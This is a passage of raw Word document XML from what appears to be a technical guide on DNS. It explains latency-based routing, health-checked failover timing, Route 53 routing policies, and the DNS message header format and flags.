        <w:t>Probes continuously measure latency to each of your endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1F908" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>When a query arrives from a known network, the provider knows which endpoint has the lowest measured latency from that network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B801A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns the lowest-latency endpoint's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E10E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> AWS Route 53 Latency-Based Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B553F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Measures latency from various global locations to each AWS region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E22355" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Maintains a database: "From ISP X in country Y, the lowest latency is to eu-west-1."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F725EB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns the record associated with the lowest-latency region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8E04F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5 DNS Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B20F57" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health-checked DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180351E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS provider actively monitors your endpoints (HTTP health checks every 10–30 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268CCF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If an endpoint fails health checks → its record is removed from DNS responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C5B0E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Only healthy endpoints are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388DDF75" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How the failover works end-to-end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C26E43" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CC33F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Normal:     www.example.com → [primary-IP, secondary-IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB4FF5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Primary dies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72273E72" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  - Health check fails (detected in 10-30s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66939073" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  - DNS updated (immediate at authoritative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4619817D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  - Clients with cached old record: still try primary (fail for up to TTL seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B897FF6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  - New queries: receive only secondary-IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEDB41" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  - Full convergence: TTL seconds after detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E331F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total failover time = Detection time + TTL = 30s + 60s = ~90s (typical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BCBF6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>This is why DNS failover is considered "slow" compared to load-balancer failover (seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C497A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.6 DNS Traffic Management — Complex Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B9C83" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Modern DNS providers (Route 53, Cloudflare, NS1) support complex routing policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225017EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-value answer (return multiple healthy IPs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B27366" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns up to 8 IPs, all health-checked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0218DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client-side "load balancing" by trying the first one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8116EE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geoproximity with bias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C595BDC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="747"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Route to nearest region, but bias traffic AWAY from a region that's over capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25F7FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="747"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>E.g., "Route to US-East, but shift 30% of its traffic to US-West" (by shrinking US-East's geographic coverage area).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7827F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chained policies (Route 53 Traffic Flow):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174616F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB8027" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Start → Geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A05F7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Europe </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Latency-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C1A0B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         │            </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> eu-west-1 (if healthy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06001DD2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         │            └── eu-central-1 (if healthy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84C4A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> US </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Weighted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978F974" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         │        </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> 90% </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106DF96" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         │        └── 10% → canary-us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC4E7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">         └── Default → Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BF8D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Primary: ap-southeast-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A251084" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                      └── Secondary: us-west-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF76056" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="00B2626A">
          <v:rect id="_x0000_i3482" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37888E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. DNS Protocol — Wire Format and Transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E63BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 DNS Message Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC50D51" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Every DNS query and response follows the same binary format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519CDD74" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E87CE4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BF0D3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                      ID (16 bits)                |  Transaction identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602298C1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B169B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|QR| Opcode |AA|TC|RD|RA| Z|AD|CD|    RCODE      |  Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF00C4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD2B7B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                    QDCOUNT                       |  Number of questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39E414" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF974C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                    ANCOUNT                       |  Number of answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C3C1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB07F7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                    NSCOUNT                       |  Number of authority records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D69FD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F81841" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                    ARCOUNT                       |  Number of additional records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C74D82" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F52A2E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                   QUESTION SECTION               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FD1CB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F004398" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                    ANSWER SECTION                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E0445" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866B432" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                  AUTHORITY SECTION               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B8FA5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37629099" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                  ADDITIONAL SECTION              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B520763" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F23794" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B2813" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QR:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> 0 = query, 1 = response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D0564" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AA (Authoritative Answer):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The responding server is authoritative for this zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4B8C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TC (Truncated):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Response was too large for UDP, truncated. Client should retry via TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C16FE6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RD (Recursion Desired):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Client wants the server to recurse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEC105" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
